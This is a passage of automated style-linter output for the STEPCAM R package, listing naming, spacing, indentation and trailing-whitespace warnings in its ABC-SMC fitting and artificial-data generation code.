^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:19:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L209) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_filt[numberAccepted] <- params[2]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:19:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        next_comp[numberAccepted] <- params[3]\n                  ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:212:14:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L212) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] <- fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:18:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        rich_vec[numberAccepted] <- FRic[[1]]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:17:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        eve_vec[numberAccepted] <- FEve[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:17:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        div_vec[numberAccepted] <- FDiv[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:17:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        opt_vec[numberAccepted] <- mean_optimum\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:219:24:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L219) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <- 1\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:221:24:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L221) *style:* **Variable and function names should be all lowercase.**\n```r\n​          next_weights[numberAccepted] <-\n                       ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:13:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, disp_vals, filt_vals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:9:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:225:27:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L225) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted <- numberAccepted + 1\n                          ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:13:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L226) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n            ^\n```\n[R/ABC_SMC.R:226:14:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:226:34:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L226) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if ((numberAccepted) %% (numParticles / PRINT_FREQ) == 0) {\n                                 ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:233:21:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L233) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                   ~^~\n```\n[R/ABC_SMC.R:233:22:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L233) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 50)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:235:13:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:235:38:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:255:54:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:258:64:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L258) *style:* **Trailing whitespace is superfluous.**\n```r\n​    cat(\" \", mean(disp_vals), mean(filt_vals), mean(comp_vals), \n                                                               ^\n```\n[R/ABC_SMC.R:259:33:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:259:56:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L259) *style:* **Put spaces around all infix operators.**\n```r\n​        \"\\t\", \"accept rate = \", numberAccepted / (tried-1), \"\\n\")\n                                                      ~^~\n```\n[R/ABC_SMC.R:262:27:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L262) *style:* **Commas should always have a space after.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^\n```\n[R/ABC_SMC.R:262:27:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L262) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_weights <- rep(1,numParticles)\n                          ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:263:20:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L263) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_disp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:264:20:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L264) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_filt <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:265:20:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L265) *style:* **Variable and function names should be all lowercase.**\n```r\n​    next_comp <- 1:numParticles\n                   ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:275:61:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L275) *style:* **Put spaces around all infix operators.**\n```r\n​    d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                           ~^~\n```\n[R/ABC_SMC.R:279:40:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L279) *style:* **Trailing whitespace is superfluous.**\n```r\n​           \"Can't stop at iteration 1 - \n                                       ^\n```\n[R/ABC_SMC.R:280:57:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/ABC_SMC.R#L280) *style:* **Trailing whitespace is superfluous.**\n```r\n​           please set stop_at_iteration to 2 if you only \n                                                        ^\n```\n[R/generateArtificialData.R:5:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L5) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(n_species, n_traits, n_communities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- n_species\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n^\n```\n[R/generateArtificialData.R:10:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L10) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n^\n```\n[R/generateArtificialData.R:10:23:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- n_species\n                     ~^~~\n```\n[R/generateArtificialData.R:12:21:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                   ~^~~\n```\n[R/generateArtificialData.R:12:47:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                             ~^~\n```\n[R/generateArtificialData.R:12:49:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L12) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                ^\n```\n[R/generateArtificialData.R:12:64:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool <- matrix( round( rnorm(n = (pool_richness * n_traits),\n                                                              ~^~\n```\n[R/generateArtificialData.R:13:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:pool_richness) {\n^\n```\n[R/generateArtificialData.R:13:50:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                ~^~\n```\n[R/generateArtificialData.R:13:58:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L13) *style:* **Put spaces around all infix operators.**\n```r\n​\t                                    mean = 0, sd = 1), 3),\n                                                        ~^~\n```\n[R/generateArtificialData.R:14:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n^\n```\n[R/generateArtificialData.R:14:37:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                   ~^~\n```\n[R/generateArtificialData.R:14:54:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L14) *style:* **Put spaces around all infix operators.**\n```r\n​\t                       ncol = n_traits, nrow = pool_richness)\n                                                    ~^~\n```\n[R/generateArtificialData.R:15:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:16:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:17:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n^\n```\n[R/generateArtificialData.R:17:12:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L17) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:pool_richness) {\n           ^\n```\n[R/generateArtificialData.R:18:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n^\n```\n[R/generateArtificialData.R:18:22:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L18) *style:* **Put spaces around all infix operators.**\n```r\n​\t  column1[i] <- paste(\"species\", i, sep = \"\")\n                    ~^~~\n```\n[R/generateArtificialData.R:19:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:20:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1[1] <- \"species\"\n^\n```\n[R/generateArtificialData.R:20:14:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L20) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n            ~^~~\n```\n[R/generateArtificialData.R:20:25:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L20) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trow1 <- rep(NA, (n_traits + 1))\n                        ^\n```\n[R/generateArtificialData.R:21:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n^\n```\n[R/generateArtificialData.R:21:12:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L21) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_traits + 1) {\n           ^\n```\n[R/generateArtificialData.R:22:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n^\n```\n[R/generateArtificialData.R:22:19:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                 ~^~~\n```\n[R/generateArtificialData.R:22:37:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L22) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                    ^\n```\n[R/generateArtificialData.R:22:40:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t  row1[i] <- paste(\"trait\", (i - 1), sep=\"\")\n                                      ~^~\n```\n[R/generateArtificialData.R:23:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(traits_pool_df) <- row1\n^\n```\n[R/generateArtificialData.R:24:17:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L24) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1[1] <- \"species\"\n               ~^~~\n```\n[R/generateArtificialData.R:25:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n^\n```\n[R/generateArtificialData.R:25:17:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n               ~^~~\n```\n[R/generateArtificialData.R:25:63:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                             ~^~\n```\n[R/generateArtificialData.R:25:65:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcolumns <- matrix( cbind( column1, traits_pool), ncol = (n_traits + 1))\n                                                                ^\n```\n[R/generateArtificialData.R:26:24:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L26) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df <- as.data.frame(columns)\n                      ~^~~\n```\n[R/generateArtificialData.R:27:31:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(traits_pool_df) <- row1\n                             ~^~~\n```\n[R/generateArtificialData.R:28:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n^\n```\n[R/generateArtificialData.R:29:26:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                        ~^~~\n```\n[R/generateArtificialData.R:29:43:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L29) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                          ^\n```\n[R/generateArtificialData.R:29:58:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L29) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- matrix(rep(0, (n_communities * pool_richness)),\n                                                        ~^~\n```\n[R/generateArtificialData.R:30:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n^\n```\n[R/generateArtificialData.R:31:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                            (sd_richness * pool_richness) +\n^\n```\n[R/generateArtificialData.R:32:19:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                 ~^~~\n```\n[R/generateArtificialData.R:32:25:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                       ~^~\n```\n[R/generateArtificialData.R:32:53:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                   ~^~\n```\n[R/generateArtificialData.R:32:61:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\toccurence <- 10 ^ rnorm(pool_richness, mean = 0, sd = occurence_distribution)\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n^\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:34:25:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                       ~^~~\n```\n[R/generateArtificialData.R:34:34:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L34) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                 ^\n```\n[R/generateArtificialData.R:34:61:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                                           ~^~\n```\n[R/generateArtificialData.R:34:68:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L34) *style:* **Trailing whitespace is superfluous.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * \n                                                                   ^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities) {\n^\n```\n[R/generateArtificialData.R:35:37:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L35) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                    ^\n```\n[R/generateArtificialData.R:35:50:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\t                            (sd_richness * pool_richness) +\n                                                ~^~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == TRUE){\n^\n```\n[R/generateArtificialData.R:37:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L37) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:37:47:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:37:65:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L37) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:38:47:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L38) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  } else {\n^\n```\n[R/generateArtificialData.R:39:12:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L39) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities) {\n           ^\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:40:13:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L40) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == TRUE){\n            ^\n```\n[R/generateArtificialData.R:40:31:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L40) *style:* **Put spaces around all infix operators.**\n```r\n​\t  if(mechanism_random == TRUE){\n                             ~^~~\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:29:](https://github.com/thijsjanzen/STEPCAM/blob/9354340730a78aada44eda3e0b54ebde7372e586/R/generateArtificialData.R#L41) *style:* **Put spaces around all infix 